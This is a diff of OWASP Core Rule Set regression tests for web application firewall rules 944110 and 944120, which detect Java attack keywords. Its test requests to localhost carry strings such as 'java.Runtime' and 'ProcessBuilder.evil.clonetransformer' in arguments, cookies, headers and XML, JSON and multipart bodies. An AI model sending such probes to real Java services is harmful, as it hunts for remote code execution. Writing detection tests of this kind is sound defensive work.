3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944110\"" - - - - test_title: 944110-13 - desc: XML attribute value includes keywords java. and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-14 - desc: XML element value includes keywords java. and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "java.Runtime" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-15 - desc: XML element includes keywords java. and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944110\"" - - - - test_title: 944110-16 - desc: XML attribute name includes keyworda java. and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944110\"" - - - - test_title: 944110-17 - desc: XML attribute value includes keywords java. and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-18 - desc: XML element value includes keywords java. and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "java.ProcessBuilder" - output: - log_contains: "id \"944110\"" +meta: + author: "spartantri" + enabled: true + name: "944110.yaml" + description: "Description" +tests: + - test_title: 944110-1 + desc: Argument test includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + version: HTTP/1.0 + data: "test=java.Runtime" + output: + log_contains: "id \"944110\"" + - test_title: 944110-2 + desc: Argument test includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "test=java.ProcessBuilder" + output: + log_contains: "id \"944110\"" + - test_title: 944110-3 + desc: Argument name includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "java.Runtime=test" + output: + log_contains: "id \"944110\"" + - test_title: 944110-4 + desc: Argument name includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "java.ProcessBuilder=test" + output: + log_contains: "id \"944110\"" + - test_title: 944110-5 + desc: Cookie test includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.Runtime + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-6 + desc: Cookie test includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.ProcessBuilder + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-7 + desc: Cookie name includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.Runtime=test + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-8 + desc: Cookie name includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.ProcessBuilder=test + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-9 + desc: Request header test includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.Runtime + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-10 + desc: Request header test includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.ProcessBuilder + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-11 + desc: XML element includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944110\"" + - test_title: 944110-12 + desc: XML attribute name includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944110\"" + - test_title: 944110-13 + desc: XML attribute value includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-14 + desc: XML element value includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "java.Runtime" + output: + log_contains: "id \"944110\"" + - test_title: 944110-15 + desc: XML element includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944110\"" + - test_title: 944110-16 + desc: XML attribute name includes keyworda java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944110\"" + - test_title: 944110-17 + desc: XML attribute value includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-18 + desc: XML element value includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "java.ProcessBuilder" + output: + log_contains: "id \"944110\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml index 79bbdcd05c..831da6f199 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml @@ -1,3151 +1,2809 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944120.yaml" - description: "Positive tests for rule 944120" - tests: - - - test_title: 944120-0 - desc: "Argument test includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-1 - desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer=test" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-2 - desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.clonetransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-3 - desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.clonetransformer=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-4 - desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.clonetransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-5 - desc: "XML element includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-6 - desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-7 - desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-8 - desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-9 - desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-10 - desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-11 - desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-12 - desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-13 - desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.clonetransformer\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-14 - desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.clonetransformer\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-15 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.clonetransformer\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-16 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.clonetransformer\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - test_title: 944120-17 - desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-18 - desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure=test" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-19 - desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.forclosure - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-20 - desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.forclosure=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-21 - desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.forclosure - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-22 - desc: "XML element includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: 